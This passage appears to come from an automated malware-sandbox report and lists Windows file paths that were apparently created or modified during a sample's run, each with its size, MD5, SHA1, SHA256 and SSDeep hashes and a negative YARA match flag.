C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\03_Music_rated_at_4_or_5_stars.wpl 1.76 KB MD5: 7132af5b0bbd7e790601856580991fed
SHA1: 53efa04ec35d36bc074698e0e8746417a3eb18a9
SHA256: a5fe2cffbbe64ef0a203f63ee164730ec741cdadcb47ced6af5e1f9867de0e8a
SSDeep: 48:yvrftDztCzUX1ZbJ3ws0IJnEfov86JL3+N:aFzgwlZbqUZdRJqN
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg 23.84 KB MD5: e16410bf598e90d136c8fd6b2009f3b9
SHA1: 134dfc47220bb0a3ffeb396440532fdf5fb187bb
SHA256: 77387dae9ab0ccf9fcfb30f301ec51283e78db7a1739fb393ebc9947a22655f2
SSDeep: 384:rbymG6JmxVDleTx2TDoFPChbAg2lkr4NEwkWdVacA6eSBJH9Fkne+JUEP9k:fExVRwqUz7ker26em5EP9k
False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa 0.98 KB MD5: c24dc758d109c74a498a029acb1bbbee
SHA1: ff52f5d140ceeb16a4b11ecf132f714f13451b39
SHA256: 49a48260d08e9dab1e8b2f81350f66bf24b0281a7e795b2379a756a92022ea44
SSDeep: 24:MTTON5BNU3RgDDGdPomXXxwrh3As5KO4gW+A:MTTOnUhgDcXXS5MMA
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms 28.53 KB MD5: 983b63593e2497ce3a7c1c6acc6530b6
SHA1: 6778043df7ae369b1d5d88612a9b8c1b9e42398a
SHA256: f014b95ba7d2251ff9fec2943fc78a768055bf06ea420cbb6b2e45d575b5ab32
SSDeep: 384:LyRpz7TtA+46zSazcyDFsItTlUb3sQ2okpBFTIqxJiNfsuBA2cWEYSxTOFn6Ctej:LeTe+46zSyRDFs13sQC/6qftcn6seBqS
False
C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url 0.66 KB MD5: 964edd71f5e8132944d4ca011352a5ce
SHA1: 9b8a3c9e16c10178b721b07cc6403e9cdcc1ffa7
SHA256: 02d0d8952700d264e5c2d2f045466330153eeb9d18b34eb6ddfddc3e6544cb04
SSDeep: 12:SqOtVMtJVUPV7swliaNyajB148UO8aGlD6kp6AvsiqKb0nBNMb580C:gwtb4lXyROYl+koAvsiqKb0nQNK
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg 5.15 KB MD5: c1e1fcab20d7bd44d6d72131347f3c60
SHA1: 293030b9fd329952178621a7bbf2e75dd9fcf250
SHA256: eea85711929d0b7f4bfe57e04176a6f4faceb9f7e53fb481b25802c9b99de2a0
SSDeep: 96:hGa8d1THTKTDIt8MYwutwRrse2RpEAP47TqtYDTHBJuxe5ZthCjI+4RXFR2:h98jTzqD7MYVRpErKWDTtajIxr2
False
C:\Users\EEBsYm5\AppData\Roaming\41xTLbSy8hho.jpg 66.80 KB MD5: b31697b470f048e7a38b4ba63da7dbcf
SHA1: 0783308ae45ee96a12075495860b3ec4ed670b40
SHA256: 079c0aa865846e5059a8171690381bd14f6864f0f4f9a6f2b5ea5964563f2322
SSDeep: 1536:bq7yJw/Mm8idRSPzTvuhnglQ7BkfpM3LU9qyDl0NY:bwODifGEnaEst0NY
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg 5.52 KB MD5: 7ae6a28d22c40f09fb4e06c67ade9d42
SHA1: 127ccb4c3534845d1d0769039c3ad37b0a7c1219
SHA256: a833c9c8c60c9efce614f390f33c4bf6e9a5cdd4aa6f1cec5378d6e7a1b95d77
SSDeep: 96:HJDyYnZcMjK2vjdShq3olGW/tG0J0QXolQB57oAdmLtesmyKLZQCaI88k:HJhnKx2hSIo1/cy0QXoCYRpKLeCp88k
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore 2.02 MB MD5: 8d9715387a37982ff707e813b019340a
SHA1: 0c1113a839b265fa507710494f7dbf36d5c0b10a
SHA256: 102e5bc9c4273310511db779bf211f7add298d1c7a17a076f82676042c0e9a89
SSDeep: 24576:AhRk5Cl7e/ge9Y5ZLWX5W+KhdVpmXgZBF5aKsK2cBti9WCPTuT:AeCl77Nt6w55aKnIWETuT
False
C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt 12.43 KB MD5: 204bd85c5d5a4f4b30067734169a9160
SHA1: 1a7e257028c91b04f34dda4b1aad34231a3e61d4
SHA256: 7b714e635a095e1b658693ab91e4884236efe2cde5f2ed814956a2ac88284d6c
SSDeep: 192:1V6l/+f3ti5wb7wcjxFwlCcEl1VuH17eFJa2bo1pb9hQh/l8AVj:1Y9+ftswbscjx+rELVuIjZbo1pvQpOQj
False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms 512.53 KB MD5: 0ca864764ea59ad67650cc9c58172d5b
SHA1: 1ff6954e5369386f488dc3ae7d7d306bb373a1f0
SHA256: f291bf29dde2fe376cb62f8c77754c75a326d38d3da4fd5cdc01c017a4b48a1c
SSDeep: 12288:W0r8kAYS+oQUPU0YyGyB0AkLg2lW7i9IKGURydp:WK8tYlU80YJPLE7irGUR2p
False
C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini 0.61 KB MD5: 4635cdafdc6e74980c791aec3bb543db
SHA1: 367d620da7b1daacd3b2d10fee6e1b9e14e2ae97
SHA256: e47a989a468ce6d8ac7fb2364a61ef8a484f2de4d1b960e581f52f3570b25d78
SSDeep: 12:ALw0mFuazsukfZhEVyvQjrZTg2Ub5/aYoKBEK59FBW/1O+ooU++7BgC:ALVyubu2Z6q8TghVouEK59Fc/1uoU+i
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm 0.75 KB MD5: d0be0685c6415a2b8726dd0e02c9b08b
SHA1: 5353af159b943956eac2f89a3499267f40d60497
SHA256: e3b237e5a07d4ffd4c74a4d0ed717624d5efad3537aff005a0ad74c0de7b3b71
SSDeep: 12:YJ9baak8onyhg+0E662CMnfiSZtCH+4LvbFWgCwC:YJ9btkbnyh2OP+sIPJ
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat 32.53 KB MD5: 6d25d007f79e1b32d5063aaf34a5bd79
SHA1: f3b12233223c74d1e4c0baeab91f97897ee1d75c
SHA256: 2abe4bf5f4a7f49d294fe5302346f86b2fecc375bbb69637329f840887c1f859
SSDeep: 768:W3iTd2w2lxeUyxtQf0BB8mwnb0ptdE4EGl4nmP:W3iTd2wuixhwnb0jq4dl4nmP
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl 1.44 KB MD5: bbd1023423e5973cf94b68d1f691212b
SHA1: b72e21129596b54d157be7337c063a44ab55ce33
SHA256: adcf93f66ba743486bd400817b9a81dafe52aa5dbd7325dbd938df4cd0fc3b56
SSDeep: 24:GE5pcSrRCo5H4ylxH4a1sp5psoQ1ymwdPpIQYsxeOzMR97PXp/tN//t9OoJtEdPZ:Pfco5YIxYa91ymwdOjs5zMRBxlB14IOH
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx 3.99 MB MD5: ef304750860074dfca21b97f76ad5d24
SHA1: 3cc6620133f46a212b8a9776382b0fc0c35cab71
SHA256: a2138977fffad2c4aabf46b62d9d5028a5f9e1f9bb7baff99070238560b4472f
SSDeep: 98304:T+BJn651h+s8aa8NHLBvUaylef22P5xGM0p:KE51h5XKaywz5czp
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml 0.78 KB MD5: 87d0679daf9dd12201706f6377521ba4
SHA1: 89eefc1f2127034b18d0829f800a38c3ba6daab7
SHA256: f12c53b705e0f3fa0e92803d214a872ad5d395ffcfba16cacd23e1e25c8e0e10
SSDeep: 24:aJjtCrVCY0TlZRQj/RdIXU1Zf2z1Pyl8l:aJ5CrIhnKzRdYUZOkI
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log 2.00 MB MD5: 129c9e124c4143a8de67919f43d79172
SHA1: 769296b7b61575411560016733efc64179ffed24
SHA256: aa7f16324adf732f55afb5e01f7437851a947ef5a2655a376ff1b18f4c62ae67
SSDeep: 49152:1ynDFTGvXDIkOodrwMXuqs6/assXHBDYZStH4Yg6:1q5QXD5tHXuqsFsApIG3
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk 8.53 KB MD5: 9ecfc5931a92f3f9942b8503a33bad15
SHA1: f333f5d0d0e9f5c1bfb9f66596a883e72e3bac06
SHA256: 9a89dab1740dfb9639fc8bd281c456fa4e626b221a743e7e72d11c1597c747b5
SSDeep: 192:oNUfYmGExmO9tZjWm0f6z96eaGjKf+5ZNHkJ4k5gSXWjvk:0GYDyrp50Cz8eHjDIJ41js
False
C:\Users\EEBsYm5\AppData\Roaming\0IDnC0H9EMmV.mp4 30.24 KB MD5: b3d4c8991947180a27a11b5fab3ac046
SHA1: 27b4521a49325c82c6296ecc8b99533bd15d4064
SHA256: 4e4e5e6d96fa53e5e29940712ef90a6ea288ef9ab4ba22b298fcc676510f9511
SSDeep: 768:9zGHHstAWE0veo/k7D5RetuJo/YUVOM3uAXWP:btLE0Go+1svQUb3uAXM
False
C:\Users\Default\Favorites\Windows Live\Get Windows Live.url 0.66 KB MD5: a45c6c54dfc4a3191c4c4b1143a99aea
SHA1: 1ec94b42d655d36852f34b1f548e122dce553807
SHA256: c30cb8b0676fae3b67be5ba1d455c1d937e2e62ac75c464a8448dc4c93113e0f
SSDeep: 12:qN0bCd1gzv3WbyH2NddCyvLmEoEasOkN7pw328dxQHNUAdwq1C:7Czs3oyWLdCyvSAaTkI32bHquM
False
C:\Users\EEBsYm5\AppData\Roaming\d9-2p9zLf4.pdf 37.41 KB MD5: db8e8a7fc6587329fd2fd21d376a96be
SHA1: 25506e96a4e6b76861735af3a8575e312be005db
SHA256: bfd963b2bd4a44d1585ac6ed62165c9d382723e48207b9da8ae83743779e2d63
SSDeep: 768:8YFmIFpevuLLoVZ26FsArd+1HCqSmFEoM+VG7OluYvQAIYeoqNvRmZQ:8YVFAvuAVZjyA0RCd7qaouYY6e7Nv0m
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat 16.53 KB MD5: 7b3bf4d1ee365be20279a24ff71f4fa4
SHA1: 9e49d881cbb08480411d3e18d1e1c9f90a41c13a
SHA256: a6a2c0ee170825aebb72a7a70eb6939bb8d30cd385d5472587dd40b53fe479a6
SSDeep: 384:0yc9u8Ar2E3pXnCqnsbkX8iszuKVM5tAeKfU1iJ6K0O:SU8GHnDXAzuKVQbKfUIJv0O
False
C:\Users\EEBsYm5\AppData\Roaming\du-5F19JYW5jR0wN.png 66.05 KB MD5: abee6d05cfd94261da2f80dd22be8197
SHA1: 1c5760a163d09e5aa405e0d1d46846a1e874976f
SHA256: 3f33558f9bd359cd93411ac666bb41762553a660de86657144929c8de39b19a2
SSDeep: 1536:e38gUDClglpRZ8+lNriAYZq1jmEajUTV95q0czvvLf/0KkXIZS:slUDVZDHi7ZqFtx+xlcIk
False
C:\Users\Default\Favorites\MSN Websites\MSN.url 0.66 KB MD5: 1aaf4cce89bb026ab2861aa8b79e0347
SHA1: d9c5bdb86e063cfda4be1fd300398c960ee9ddbe
SHA256: f99fea69d61b7e8b6810d47f722a244903254a1dcb07bd7ac2615405945795eb
SSDeep: 12:yIvbpzin+5GMGXxkE87YuNeKn91EuvrDQ/dTSD6r0BRZmI3Z5CYks2mk0C:yIvNzi3i17H/91vnwdTSmrIpp5CJsLkt
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm 0.75 KB MD5: c30f7c451f90e4542386f657f17a5ccd
SHA1: a3a70f40cd384bfb8257b21e4e560b29c8c29fe7
SHA256: 2faca9452f7336aaf91b820386e2251b0f50d9f2d46e6b1f6ef2a317bb02899f
SSDeep: 24:e1SFs8TFfyRNTkEkW6lhI+rAp9FY/gLIiKQO/:eEFs85u2EkW6l7ru8KK7/
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\b652534aebe43ee746cbc40ead5a6d17_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb 0.57 KB MD5: 04dc1c6221d635bf9c29eb1e6c8c1c15
SHA1: 7d7b77f284f1b071eea40baf53d0ed12c66fa662
SHA256: 48ef1b1da9290c33fde2a12a1c54dc6b10fedb110d120fbd57d0952116d0d8d4
SSDeep: 12:Xz+stIF3YxbgoTsdm2rTqUIpkD7JlgxbWC:D43Yxmdm2rTqVgfg97
False
C:\Users\EEBsYm5\AppData\Roaming\eybr.mp3 22.89 KB MD5: 707f84ec045133943b88addc931ff046
SHA1: d691d0adfa1e71a0d817d881ed74ecbb10b94e25
SHA256: 80a782a5110284ff7fa15736c8c617a55d290ea9a7964b1368cb294ccd43e56a
SSDeep: 384:0ul6a9Al1rOWjiqSEVnMXWBZgI9LySxLBC4FvScQnvd9m6wCJ2UOMgibADvlcjg9:l6ug1rOqVPVnSWDgItTXZvQXwC7OMgpF
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\06_Pictures_rated_4_or_5_stars.wpl 1.29 KB MD5: ca3fadf17a6cd05514e1bca65be2eeb8
SHA1: bd65cc62485579dccb3c884a40580642573b9d35
SHA256: e7e8e61d310b44d74719b88ad6faceb4299b0bc8f13a643295252b80fc274ae4
SSDeep: 24:GtuzM4T1KQx/bnOX2NPTQHISWBX1e2/0IZAJv59931j/B9UL3OkP:GtYM4TIQxCXckHlWW2/9wv5911j/Bue+
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm 0.76 KB MD5: 20fda93e224c1c9f93fb807a9aadc67b
SHA1: db4050e6573ccf241b9253e4c4ce76ee75107b01
SHA256: d336fc9e79ff7b9c20f66f5d19401169161fdb712c8257c2eb1b5146372cb3cc
SSDeep: 12:cbV9KSL+0bjA0te/K4vAg9Z3zSOHRM+w3WZdkBo1qqNxr5zYFsGZosr76AEC:YV8S0+4vA8jRM+70BWdraFV606O
False
C:\Users\Default\ntuser.ini 0.55 KB MD5: ea6c61a5e8d2449aeea082799e749211
SHA1: 8ba381c1483fd0c59d7995191c3182c36af9ff09
SHA256: 2d3d187bda08daa4cc4f617aa9bd697683317e599af9bc1e59b76f6cbf789d71
SSDeep: 12:ktd18ueIB0pFCWvHiBjAXskLRnkhV+PR4/8KfiNpKEzmwC:ktd1B+p1H08lLoV+Z03KbA
False
C:\Users\EEBsYm5\AppData\Roaming\40id.mkv 85.66 KB MD5: 856439921529ebb1d7f736c769066ecf
SHA1: 2d32e39201c68edd8c40cc05e8a176db62f0649c
SHA256: 35f6d579bd1c90b715afa45e91c99eaee024b9042778003ce1ee36c7eeeebb85
SSDeep: 1536:xSNQBpo7YKEXDyI0EFuDRsU+OFmab+s3Ot/TPKb9T3XesIGF1jeI7kjj:E4poMKpoFuOU+O8U+LjKpSsIM1jek2j
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm 0.78 KB MD5: 7f2a95721a46c7768c2794fca7818f48
SHA1: 789405bd1ddf8c39502bf4d8b270c7e62b1bfbc2
SHA256: b76e5e5f76e9e1d70977ffc2547aca875ae528de16184d4a5025975662e71c8c
SSDeep: 12:UZM2N7dNN6DTW/RAg2OsUFCrWMtIi3eU7Z+22sF+ZO/acQFdjG+xcuTdipwXwjBE:H2v/yW/RHsDrqctJEZQhQbS+C4dja6gc
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms 28.53 KB MD5: 4f871b7f359d21d75e6193e46cfce088
SHA1: 67a5b73f22897f6b191e8e6794323269b544086d
SHA256: 3a5657f6715cf8c1e99eca21e33129d9922ee4fca896146627a3dd06effa760a
SSDeep: 768:pCFSUtWGRZoPqS1jVMckq6e1m6tln25zxugNztAEl:BUt3oPqSgcv6ell2xQgBtAEl
False
C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url 0.66 KB MD5: 5281a5e5f8e21d04ac3b83f929703cb7
SHA1: 078b9c631e460b2d8a374dfac0336cd7c2e60370
SHA256: 5046b4df6aa15549cd81ae9e074f1b75c90eef1617205183f383d509ef3349a0
SSDeep: 12:TulgZlnh2qhqhqRst1f0UoWzzp+iaMYjVXenDWLRQeafH5fmay7j9J4cxC/6C:TuKlnh2nhFttospzanjVOD+qTfH9u7j0
False
C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url 0.66 KB MD5: 11690206385ef412171fc9b751182ffb
SHA1: fa05cd02291c1dc05178d73d3d800a96415bb75d
SHA256: 0dc9ef51cfb826568a3366bd1f545999f71e1f23a45170eec68d510d3ec051c1
SSDeep: 12:FooavJunFEqoe232EZTrgkcSJdVlpkSXK8NtwumLZTxCusC:moavgnFloe232UVlpTPNtyLZrV
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg 2.40 KB MD5: 09ef80e93c8e178155ea88ad8c64fa77
SHA1: a7c78ffaca70ba8e7e2a279391cdd40bbb6e1d5f
SHA256: adcf7c8500d27dd586d38a6cf8960cffb89e488cdfa77f8d69d9b9af825b9087
SSDeep: 48:xcKfmfB3YvFKXCHrhbaYHZhKMwKohvEMHxWqNcVV6zIQz96hWqQJ5Yy1:ynovkXCLdnK42MQWqNcyzIi4I5Jd
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js 0.54 KB MD5: eff5a840cafee9119e5ba935c62427ff
SHA1: a2df7e77cf5d93f87a9aa415347e7b9c604739aa
SHA256: 68e8f63cb0a382702074c047abb9d685b6b6d274c2641892a786f868a0474aa0
SSDeep: 12:NF4Y1BqAjfIFd81Ty6Ksd7wsZZUGk77F7EwSomHY5/GlwU0FQC0C:Q6qAjAx6KsdEzhEwxmeGlwtFQCt
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm 0.75 KB MD5: fa4b52b42785d48b1970a6a47d5d95dc
SHA1: 18ba77b16b354ee8c92e5f5a8bf5738b3748404c
SHA256: d8a1c1033b272de4a7b5232f57299ceaadfa0e07e7f6a89dc42650ec84e9c85a
SSDeep: 12:FRJ/JDmadmJhWsUTX1gBfwiY2fo/5iuvmz9dURaf/rE4Y5kF5M2Szv/Gn0C:F/kJhoXXiYlhiuO3Uor7Y5kU1zH2
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount 1.18 KB MD5: 647400c8c615ae0bbae0e66c050be1f0
SHA1: 09dce00ae65f4ad81080b707c9fee1e37303ea26
SHA256: 896719eabf24e89d64c45108b87e81abab56995076b177adeb41bf12ab9d55d7
SSDeep: 24:4gvfNLLc06qjR7Q4B/3ekrj3pWsPxedQqloh4ew59eI7X0iWJ7BhtLVy:FL59OE3JPEVp9NYldLI
False
C:\Users\EEBsYm5\AppData\Roaming\D1Mcqgb3FDTv-8KryA5.jpg 76.34 KB MD5: b64ce85a92d617b4f4328943dc3b48c5
SHA1: e2ebb9614f7b396d3d5346959a9972f4fce1958e
SHA256: 8b081bb255dd3eb8b27f1569b888f4dfe5cdcf638b073ba1872f48b76a3e8e65
SSDeep: 1536:tm++TKTJjKDi+wLf2arHIeEtt6tayYqGMuLBF9mDTv5oifoo1puu:tm+eKTJjgi9JWekiKifR9
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb 66.93 KB MD5: a178bb3757271532807198ae2034ccb7
SHA1: 094fbe05113d6587fbedb2f2ee0074c9f7b7af52
SHA256: d142124d24eaba937b648e9582f3af09534450cc8d1783c88f2fe84ac4d6bd15
SSDeep: 1536:JHaIdIfg2I2m0uCqxb5UeETrYhs3zSnKLrS0cuv/QyPx1MFmwHfP8d:JHu6muCgcXIs3zS4201/QQIFmwHfP2
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\04_Music_played_in_the_last_month.wpl 1.78 KB MD5: f175bf1a56bdb6a0c89fb960230a6b4a
SHA1: 841fd7583648c9a970be8ead983b1ff980d21158
SHA256: c1e50ae901167d88f2f27f7d9c136550c5834c7b292daf8c40de0402eb058712
SSDeep: 48:Fxl+CG53BjVcYhFgCjOF+cUGzKKUKBTvtUtQVN+n9g:FVkgoxj5uRpvyQH+n9g
False
C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url 0.66 KB MD5: 40e308e76be72564f8c265dc0b2153e6
SHA1: eaa55eb11bf4fb85bb37afc548e47bebd5a6a6cb
SHA256: 7cf95aa1b97b0869b71db4f538f254017c448d2e46d40e06b596083c44270b6d
SSDeep: 12:WPCGUswQNA91l17aEEiARE/PVxerxdjaMMwws2PkCmtt1AJoMgXEC:WCubNymRi6E/P7e15aMMyWmtt1AJnu
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg 6.78 KB MD5: c12c774292b6211dfe0763918af2988e
SHA1: 7304255c5af276980b2f711cff597c07d672bc79
SHA256: e18af46741c1fe541e96c40cac4ef4075410d042e966bf92fd809b9578d03c6e
SSDeep: 192:AoTcfKF1Fh1TsYkaR+qgrmfMS1XzFtg0GN5E2wxQ:3ofes3Ewm1l//GN5EBQ
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm 0.75 KB MD5: 31a98a74dc566525eabae64752ca46e7
SHA1: 078d36536d10b5cfa161f15bc929557867ac0581
SHA256: 80bab6ebd122e3ebb91302d6d1b26ee97c2d59ee9fa15f3e447da0172349e6aa
SSDeep: 24:J6UwmnEWRgYHqnnAlNpwuiftTm4d2Mc0Nb9Jm4O:lwmnEWRAnypwuiBO0o
False
C:\Users\Default\Favorites\MSN Websites\MSN Sports.url 0.66 KB MD5: 531e543609937064983dbfd399932bcc
SHA1: 6cff70cc115a906e9f7c462028840e1a350ee79e
SHA256: a53cfbbc14aadf0980c488b9e7c9bf64dfd22213fd2fb737509ab8bb4036132d
SSDeep: 12:A3t8Zt/tJknJhAmJktenqzqEn3UCAtpnzCxUs0bhW4SqK7b8EJzjgOEre9+EC:Ad8Zt/sJho2RpnWx6uJmre9+d
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms 28.53 KB MD5: a25e8ba722ddc612bebe7b591223ff0f
SHA1: acb3eb40e04c39377622bba55e7e7da9ab884813
SHA256: d5b2f55728973c220dad3c90d4b3273f7e7becfe5d54f2695c64e70f59e5553f
SSDeep: 768:WFNgpIrrSXybyWtgZks0peYCAkkl6T7EJkAsnul9JBe5OYdGsEOP:Wr4IGybUms0pxzk+VJkAP9JCXdz7
False
C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\boot.sdi 3.02 MB MD5: 2b9909fdea8fb580e0c902e462edf41c
SHA1: bb18f05acab12df6032256cbdec702cf9756efe8
SHA256: ce281434c12f290cc1c7704e41c2612b3fa186d017f288524f895067f7255da4
SSDeep: 24576:ugeknX9XKzyKUzyWWEUiNaKc9XJOwgcac8F1NEG369+PPdllBH/ve:uge0xKzyLzgAaXXY1NL36ipB/W
False
C:\Users\EEBsYm5\AppData\Roaming\H5WuKLQ 4 uu.mp3 56.22 KB MD5: 2a70304bd3d0fd0693b06f22b4564874
SHA1: 68abe7904868e796c5ce1b590da5da5df06d3321
SHA256: ea00449016e83af1963007638e6ddca14fbf2257720b76c1acc1306e3da4e076
SSDeep: 1536:zDlhPR/mf/5QDRuZvNU8slIRZhxd+u69USXuBDyfd:zDlFR6RtZVUPiPoU5yfd
False
C:\Users\Default\NTUSER.DAT.LOG1 193.53 KB MD5: 054149c493abea88d289f13678dc9bb3
SHA1: 0555e80f8a32375fcbccebe6e3a146ee442110fd
SHA256: cb68aea295249d60de6f8bde255772b4d617dadbbd2ac366da114ca4825e6989
SSDeep: 6144:CA8ViETAJXHwOabkATBDSlYo8JDNoMabFHVkkNa:6/u3ikGBDRo8NNolbFHVzs
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\index.dat 32.53 KB MD5: 3ae587e40a62bed97be33469e4749f40
SHA1: 1206d98147da7db758e46ac0365b2068a9fc6c0d
SHA256: 3d00c1362d92540499969f1a6d04b653ad8784f5f43a89449460bb731a39405e
SSDeep: 768:Uc9KyMRgx8WZnzSEm5nix9H2RAOnUdKldvc1yeZOeAN0a73a2Lvn2ezggOv:UGKyMo8czk5nsWeGU6dsyBeAXv2Yg7v
False
C:\Users\EEBsYm5\AppData\Roaming\jEsyH8xMpokXjc mOu0.ods 63.59 KB MD5: edb811df3dea650e368e9b651a6a9184
SHA1: 976c0805c5063a2e73f176320380e396b913377d
SHA256: 23183ad9b75dd9f0cf0302cdf3f3c78a98ab09063474d5904bc5b6fdac8a94f6
SSDeep: 1536:LGh8IV5U823Vj3XPTD2Ef+bKZLJiVmBI/mgtgU:LGqI/Uv3VbTD2ySOLJiQYgU
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\12_All_Video.wpl 1.58 KB MD5: 4785b7b937059add40873186c78da206
SHA1: 2787a1e36de189e5f1ea4feaa3ff24ce61e622ae
SHA256: 602d52626f38d7b252170c0b14d8154321c1ac54046493c2b6a49afd69749847
SSDeep: 48:lVp0QpTgERlw1kvXhp8rFZWg6myivOMrRZ1ROlyB:mQWUwqPLUZWTgvOkfOli
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb 1.02 MB MD5: 759147dff1d103e4f37c451d20afb32d
SHA1: 4624b632f13d6c568f7019b60e9242dcc1c5d3df
SHA256: 613c601b4601fd8c0e6a7118661f2b3e92019f5b102b4e403f3f5e76a3491202
SSDeep: 24576:YSPlJfsvYCs6i7DsMLpTuMaeGHwL8P8huJqbVpmKI8jHR:YElJfQNa7DsMLpgHwL82/hjx
False
C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url 0.66 KB MD5: e834abb851ad70b73d96c7d3f80d8861
SHA1: e78d9db42842489f633dce85d96f357f451238fc
SHA256: f8be6489a346497d9d2df6895b92b96aa3f71c458e1bdfef2301bcba8443188e
SSDeep: 12:MVXF+mfZOLnBcr2jb7nogdz6GvWcsa9QXL8/YKCIeOnhYMAsX0C:S5oo2H7nZV6AqM8mhYRsXt
False
C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat 32.53 KB MD5: fb971a91b0f824a8f3eed9d2f1a0da47
SHA1: 9541de218d6d7463a9538f40d06b70ddc4fe4116
SHA256: 0b45b6105d597481a5377513b992d6337e648a311ce9a0c32c505b5300ef3724
SSDeep: 768:8N1skyyHLcpfNhFv49S/YSxAcWK5dk9QiDK9v6n0:2TIpmAA+AcVvkPqk0
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\01_Music_auto_rated_at_5_stars.wpl 1.55 KB MD5: 14d44a791b667848a60c6416e8e2184a
SHA1: 74a8ca16ec8ce6cc5e42aff51b4dd3ed8eecd161
SHA256: e6cd0ef2d4976605e234163f25414006fcfd911fd85723fb5d4e28a51062c0ee
SSDeep: 24:43BznA3zBeLYYeVFhKGLwc7/ScPGQ10zdvdVnijCtN6Ora/IBKCXuxRZl+XO62FR:azhLYYe/Y+waxPGQm9nxpgCORP2O6YR
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore 2.02 MB MD5: 196c53d5bec2b1543186a01c430d87ac
SHA1: 2b66308da8a93d784da9040440b1dc0389511d4a
SHA256: f519cc6497eef1b721d8fdafd6263a4a4f89303986bb34b8c078c649956dba3b
SSDeep: 24576:oXDD8PQSkf/8obA3h+R12xkb2L++c0oTFDurAwigWN:OSbItA+DskbkZpoTlIXi5N
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url 0.66 KB MD5: 9cd88b374f86257b7f7470ef294da5bc
SHA1: fc11f82fffd3aae354eba1fab8659b1a5c84e348
SHA256: a7bf0040241354f85517c2d9de8623091b9c4418754fde2199781fd8aff043de
SSDeep: 12:7bLpx1/fqeqgRMJklOHocjPEOPG+k01o8dj5H49lUoilZBKYus5qFvZfe387Vw0C:XLr1/M/1IYNk0C2q9lUP8Y+vF7Q
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm 0.76 KB MD5: dcea0afa183d29732fa2c7a088ec95ab
SHA1: 0b097632c02c7099ce62a2e45995dedaf898ca34
SHA256: f8acaf6ce09a0ea669f69468d469f5826d4cb7627987810c2de20ab7bc971789
SSDeep: 12:uN3I82QjtUMkYlUYQlvzsWbVpOZOhKCtuDbSiSyX+AfjdHS9FeyyoayJORckK3ZC:QIC5C7zsaAZOzASNWjyLyNgO6kKw
False
C:\Users\Default\AppData\Local\Temp\ConfigureMachine.log 0.63 KB MD5: c3584fc08cee9060a3d9e598430be647
SHA1: 89703490dfbcc4675b1dab42d121b029fab1c89c
SHA256: 892cc2087d18c329f17bafbef274f85319011cd901048d3b48600878afb33b69
